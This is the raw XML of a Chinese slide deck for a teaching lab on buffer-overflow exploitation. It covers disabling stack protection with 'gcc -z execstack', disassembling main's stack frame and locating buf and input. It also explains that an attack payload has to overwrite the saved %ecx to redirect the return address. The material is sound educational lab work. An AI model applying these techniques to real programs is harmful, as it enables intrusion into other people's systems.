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60" r:id="rId3"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="315" r:id="rId6"/>
    <p:sldId id="326" r:id="rId7"/>
    <p:sldId id="370" r:id="rId8"/>
    <p:sldId id="371" r:id="rId9"/>
    <p:sldId id="285" r:id="rId10"/>
    <p:sldId id="339" r:id="rId11"/>
    <p:sldId id="372" r:id="rId12"/>
    <p:sldId id="373" r:id="rId13"/>
    <p:sldId id="374" r:id="rId14"/>
    <p:sldId id="375" r:id="rId15"/>
    <p:sldId id="377" r:id="rId16"/>
    <p:sldId id="376" r:id="rId17"/>
    <p:sldId id="378" r:id="rId18"/>
    <p:sldId id="379" r:id="rId19"/>
    <p:sldId id="380" r:id="rId20"/>
    <p:sldId id="381" r:id="rId21"/>
    <p:sldId id="382" r:id="rId22"/>
    <p:sldId id="384" r:id="rId23"/>
    <p:sldId id="348" r:id="rId24"/>
    <p:sldId id="349" r:id="rId25"/>
    <p:sldId id="385" r:id="rId26"/>
    <p:sldId id="386" r:id="rId27"/>
    <p:sldId id="387" r:id="rId28"/>
    <p:sldId id="388" r:id="rId29"/>
    <p:sldId id="389" r:id="rId30"/>
    <p:sldId id="390" r:id="rId31"/>
    <p:sldId id="392" r:id="rId32"/>
    <p:sldId id="393" r:id="rId33"/>
    <p:sldId id="394" r:id="rId34"/>
    <p:sldId id="327" r:id="rId35"/>
    <p:sldId id="328" r:id="rId36"/>
    <p:sldId id="395" r:id="rId37"/>
    <p:sldId id="396" r:id="rId38"/>
    <p:sldId id="397" r:id="rId39"/>
    <p:sldId id="265" r:id="rId40"/>
  </p:sldIdLst>
  <p:sldSz cx="18288000" cy="10288270"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId4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39"/>
    <a:srgbClr val="4F75AF"/>
    <a:srgbClr val="81B4E0"/>
    <a:srgbClr val="DCEAF6"/>
    <a:srgbClr val="2B2E30"/>
    <a:srgbClr val="B44C39"/>
    <a:srgbClr val="477BAF"/>
    <a:srgbClr val="FCF7F0"/>
    <a:srgbClr val="2E3C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/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="185" y="27"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="3160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55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首先，什么是使用开源软件供应链中的风险呢？我们将可能遇到的风险进行一个分类。对于像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pytorch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这样一个被谷歌、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Meta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>波音等等超大公司视为基石的重要机器学习平台，最常见的风险还是安全风险，即由于上游项目的安全漏洞、软件故障、恶意代码等等所带来的直接风险。这种风险的危害极大，常常会对供应链下游的大量项目带来根本性的毁灭。正如前面依赖分析所述，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pytorch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的供应链是比较扁平的，这就意味着，安全漏洞总得来说还是比较好发现的，一旦发现，往往很快也能得到纠正。例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2022</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年圣诞节期间，黑客通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>pip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PyTorch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-nightly Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包安装了一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>torchtriton</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的依赖项，它在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>包索引</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>PyPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>代码存储库中遭到破坏并运行了一个恶意的二进制文件；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2023</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>年九月，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0"/>
              <a:t>JOHN STAWINSKI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="zh-CN" dirty="0"/>
              <a:t>Adnan Khan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>曾发现了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pytorch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有严重的持续集成和部署漏洞，并因此获得了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>万美金的奖励，后面会以此案例作为安全风险的典型进行详细介绍。当然，如今</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Pytorch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也会面临开源项目常见的非常规风险，例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>···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200" y="1371840"/>
            <a:ext cx="14698800" cy="385627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8200" y="5341534"/>
            <a:ext cx="14698800" cy="220898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spc="2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2600" y="1161203"/>
            <a:ext cx="16459200" cy="8225639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8200" y="3726652"/>
            <a:ext cx="14698800" cy="152846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798200" y="5341534"/>
            <a:ext cx="14698800" cy="70752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6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00" y="2235991"/>
            <a:ext cx="16453800" cy="7140049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6200" y="5773610"/>
            <a:ext cx="11653200" cy="115040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6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86200" y="6924011"/>
            <a:ext cx="11653200" cy="130162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600" y="2252194"/>
            <a:ext cx="7765200" cy="7123846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17400" y="2252194"/>
            <a:ext cx="7765200" cy="7123846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12600" y="2144175"/>
            <a:ext cx="8013600" cy="5725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600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9353625" y="2132967"/>
            <a:ext cx="8013600" cy="5725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353625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2600" y="2333208"/>
            <a:ext cx="7849616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5600" y="2333208"/>
            <a:ext cx="7840800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5352200" y="1371840"/>
            <a:ext cx="1566000" cy="75451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2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1371840"/>
            <a:ext cx="13753800" cy="7545120"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert" lIns="46800" tIns="46800" rIns="46800" bIns="46800"/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:defRPr spc="300"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="1028700" indent="-342900">
              <a:defRPr spc="300"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1714500" indent="-342900">
              <a:defRPr spc="300"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="2400935" indent="-342900">
              <a:defRPr spc="300"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="3086735" indent="-342900">
              <a:defRPr spc="300"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912020" y="912179"/>
            <a:ext cx="16454438" cy="1059841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912020" y="2236386"/>
            <a:ext cx="16454438" cy="7140236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919163" y="9474270"/>
            <a:ext cx="4048125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6174582" y="9474270"/>
            <a:ext cx="5938838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3315950" y="9474270"/>
            <a:ext cx="4050507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371600" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="54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7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287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414905" algn="l"/>
          <a:tab pos="2414905" algn="l"/>
          <a:tab pos="2414905" algn="l"/>
          <a:tab pos="2414905" algn="l"/>
        </a:tabLst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7145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4009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0867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8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png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2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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5.png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6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png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5.png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5.png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5.png"/><Relationship Id="rId2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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag85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image" Target="../media/image5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag105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image" Target="../media/image5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag109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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag113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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12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image" Target="../media/image5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag125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image" Target="../media/image5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag129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0.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13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4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag141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../media/image5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag145.xml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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag149.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide34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image" Target="../media/image6.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2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" y="1769110"/>
            <a:ext cx="18288000" cy="3556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3575" y="2586355"/>
            <a:ext cx="16826865" cy="233616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缓冲区溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN"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实验</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="6700" b="0" kern="120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800" b="0" kern="1200" normalizeH="0" baseline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+mj-ea"/>
                <a:cs typeface="Bauhaus 93" panose="04030905020B02020C02" charset="0"/>
              </a:rPr>
              <a:t>Experiment of Buffer Overflow Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800" b="0" kern="1200" normalizeH="0" baseline="0">
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:noFill/>
              <a:latin typeface="Bauhaus 93" panose="04030905020B02020C02" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Bauhaus 93" panose="04030905020B02020C02" charset="0"/>
            </a:endParaRP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94510" y="5609590"/>
            <a:ext cx="14699615" cy="1511935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="135000" tIns="70200" rIns="135000" bIns="70200" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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汇报人：郝淼</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200" normalizeH="0" baseline="0" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122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时间：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="1200" normalizeH="0" baseline="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.xx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" kern="1200" normalizeH="0" baseline="0" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn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安全机制规避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78255" y="2155825"/>
            <a:ext cx="16263620" cy="1210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2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>注意，payload 注入后位于栈上，而我们需要运行这一段内容，因此在编译漏洞代码时，需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="1">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>指定 gcc 参数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>-z execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>，使栈上内容可执行，具体 ELF 中的区别为：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect r="34804"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1344295" y="4366260"/>
            <a:ext cx="16131540" cy="20561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819910"/>
            <a:ext cx="7272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+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2800" b="0">
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
              </a:rPr>
              <a:t>通过反汇编查看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main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函数的栈帧：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture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295" y="2799080"/>
            <a:ext cx="15518130" cy="38023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9640" y="1834515"/>
            <a:ext cx="626935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&gt; lea 0x4(%esp), %ecx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argc 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%ecx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ret addr0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%esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="32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6780" y="1765935"/>
            <a:ext cx="953516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&gt; and $0xfffffff0, %esp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argc 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%ecx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ret addr0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 ... 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%esp (4-byte align)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="32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03645" y="1598930"/>
            <a:ext cx="10310495" cy="6492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argc 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%ecx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ret addr0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 ... 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ret addr1  |       ret addr1 = ret addr0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old ebp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%ebp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 %ecx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%esp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1344295" y="1847215"/>
            <a:ext cx="431736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3200">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; push -0x4(%ecx)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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; push %ebp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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; mov %esp, %ebp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algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Cambria" panose="02040503050406030204" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; push %ecx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819910"/>
            <a:ext cx="7272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+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0"/>
              <a:t>获取 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              </a:rPr>
              <a:t>buf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0"/>
              <a:t>在栈上的相对位置：</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture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295" y="2519045"/>
            <a:ext cx="15401290" cy="4756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40860" y="1673225"/>
            <a:ext cx="11302365" cy="6492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ret addr1  |       ret addr1 = ret addr0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old ebp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%ebp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 %ecx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  ...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buf = %esp - 0x88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  ...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  ...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|     ...     |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+-------------+ &lt;---- input = %esp - 0x888</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="32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819910"/>
            <a:ext cx="7272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+mj-lt"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0"/>
              <a:t>查看 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="0"/>
              <a:t> 函数的退栈过程：</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture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295" y="2853690"/>
            <a:ext cx="15300960" cy="3384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6925" y="1803400"/>
            <a:ext cx="6087745" cy="6985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&gt; mov -0x4(%ebp), %ecx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argc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%ecx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addr0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 ...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addr1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old ebp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%ebp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 %ecx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  ...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%esp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9042986" y="1803111"/>
            <a:ext cx="0" cy="66825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146155" y="2298065"/>
            <a:ext cx="547624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&gt; leave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&gt; lea -0x4(%ecx), %esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0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argc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%ecx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addr0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%esp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 ...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addr1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old ebp   | ----&gt; %ebp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89380" y="1377315"/>
            <a:ext cx="15509240" cy="1210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lea -0x4(%ecx), %esp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这条指令非常关键，它直接决定了 ret 指令的返回地址到底在哪，因此，在设计攻击 payload 时，还需要覆写栈帧中 %ecx 的值，将 %esp 恢复为 ret addr1 的地址。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2440940" y="2900680"/>
            <a:ext cx="547624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&gt; leave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&gt; lea -0x4(%ecx), %esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0">
              <a:solidFill>
                <a:srgbClr val="FF0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argc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%ecx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addr0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%esp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 ...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addr1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old ebp   | ----&gt; %ebp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93580" y="2900680"/>
            <a:ext cx="547624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argc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addr0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 ...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 &lt;---- %ecx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addr1’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 &lt;---- %esp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XXXXXXXX  | ----&gt; %ebp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+-------------+ &lt;---- %ebp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%ecx’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043035" y="2912110"/>
            <a:ext cx="0" cy="55740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19430" y="3251200"/>
            <a:ext cx="46304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&gt; mov -0x4(%ebp), %ecx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&gt; leave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  <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; lea -0x4(%ecx), %esp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800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20700000" flipH="1">
            <a:off x="-1219685" y="-476230"/>
            <a:ext cx="7321823" cy="11492860"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="adj1" fmla="val 2939410"/>
              <a:gd name="adj2" fmla="val 16617515"/>
              <a:gd name="stAng" fmla="pin 0 adj1 21599999"/>
              <a:gd name="enAng" fmla="pin 0 adj2 21599999"/>
              <a:gd name="sw1" fmla="+- enAng 0 stAng"/>
              <a:gd name="sw2" fmla="+- sw1 21600000 0"/>
              <a:gd name="swAng" fmla="?: sw1 sw1 sw2"/>
              <a:gd name="wt1" fmla="sin wd2 stAng"/>
              <a:gd name="ht1" fmla="cos hd2 stAng"/>
              <a:gd name="dx1" fmla="cat2 wd2 ht1 wt1"/>
              <a:gd name="dy1" fmla="sat2 hd2 ht1 wt1"/>
              <a:gd name="wt2" fmla="sin wd2 enAng"/>
              <a:gd name="ht2" fmla="cos hd2 enAng"/>
              <a:gd name="dx2" fmla="cat2 wd2 ht2 wt2"/>
              <a:gd name="dy2" fmla="sat2 hd2 ht2 wt2"/>
              <a:gd name="x1" fmla="+- hc dx1 0"/>
              <a:gd name="y1" fmla="+- vc dy1 0"/>
              <a:gd name="x2" fmla="+- hc dx2 0"/>
              <a:gd name="y2" fmla="+- vc dy2 0"/>
              <a:gd name="x3" fmla="+/ x1 x2 2"/>
              <a:gd name="y3" fmla="+/ y1 y2 2"/>
              <a:gd name="midAng0" fmla="*/ swAng 1 2"/>
              <a:gd name="midAng" fmla="+- stAng midAng0 cd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stAng">
                <a:pos x="x1" y="y1"/>
              </a:cxn>
              <a:cxn ang="enAng">
                <a:pos x="x2" y="y2"/>
              </a:cxn>
              <a:cxn ang="midAng">
                <a:pos x="x3" y="y3"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7687" h="12066">
                <a:moveTo>
                  <a:pt x="4880" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7687" y="10474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1747" y="12066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1704" y="12013"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="662" y="10741"/>
                  <a:pt x="0" y="8841"/>
                  <a:pt x="0" y="6717"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="4114"/>
                  <a:pt x="993" y="1847"/>
                  <a:pt x="2463" y="661"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2488" y="641"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4880" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="6000">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="40000">
                <a:srgbClr val="5399D4"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="2E3C63"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="2700000" scaled="0"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="203200" dist="127000" dir="2700000" algn="tl" rotWithShape="0">
              <a:srgbClr val="5399D4">
                <a:alpha val="4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35693"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6528435" y="8111120"/>
            <a:ext cx="11759565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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471965" y="1244547"/>
            <a:ext cx="3469481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080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</a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="10800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="造字工房朗倩（非商用）常规体" charset="-122"/>
              <a:ea typeface="造字工房朗倩（非商用）常规体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472440" y="3491337"/>
            <a:ext cx="3469482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en-US" altLang="zh-CN" sz="480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CONTENTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4800">
              <a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:ln>
              <a:noFill/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210300" y="417142"/>
            <a:ext cx="8804910" cy="1856423"/>
            <a:chOff x="7816" y="851"/>
            <a:chExt cx="9244" cy="1949"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3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38" y="1826"/>
              <a:ext cx="5689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>
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>实验原理及平台介绍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42773" y="2273565"/>
            <a:ext cx="8804910" cy="1856423"/>
            <a:chOff x="7816" y="851"/>
            <a:chExt cx="9244" cy="1949"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="矩形 17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>
                  <a:solidFill>
                    <a:srgbClr val="2E3C63"/>
                  </a:solidFill>
                </a:rPr>
